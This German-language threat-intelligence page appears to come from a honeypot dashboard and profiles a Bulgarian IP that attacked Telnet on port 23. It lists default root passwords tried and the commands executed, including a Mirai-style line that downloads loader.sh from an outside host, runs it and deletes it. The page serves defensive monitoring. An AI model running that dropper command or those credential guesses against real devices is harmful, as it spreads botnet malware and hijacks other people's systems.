TROYANOSYVIRUS
Aktive BedrohungMITTEL

185.246.131.94

Herkunftsland🇧🇬 BG
Erste Erkennung18.4.2026
Letzte Aktivitat18.4.2026
ISPBrainStorm Network, Inc
🎯
208
Gesamtangriffe
🔌
1
Ports
📡
1
Angriffsarten
🦠
2
Malware

Geolokalisierung

Land
🇧🇬 BG
Stadt
Sofia
ASN
AS136258
ISP
BrainStorm Network, Inc

Angriffsarten

ssh_telnet_honeypot

Angegriffene Ports

23

Zugehorige Malware

Versuchte Anmeldedaten

🔐root/password
11x
🔐root/(leer)
11x
🔐root/admin
10x
🔐root/root
8x
🔐root/12345
3x

Ausgefuhrte Befehle

$cd /tmp || cd /run || cd /var/run || cd /dev/shm; wget https://tg-xxooxx888.8964.mom/loader.sh -O .x 2>/dev/null || curl -s https://tg-xxooxx888.8964.mom/loader.sh -o .x; chmod 777 .x; ./.x telnet; rm -f .x14x
$echo mirai14x

Shodan InternetDB ExpositionShodan

InternetDB-Daten, nicht in Echtzeit

Risikobewertung

45
/100
NiedrigMittelHochKritisch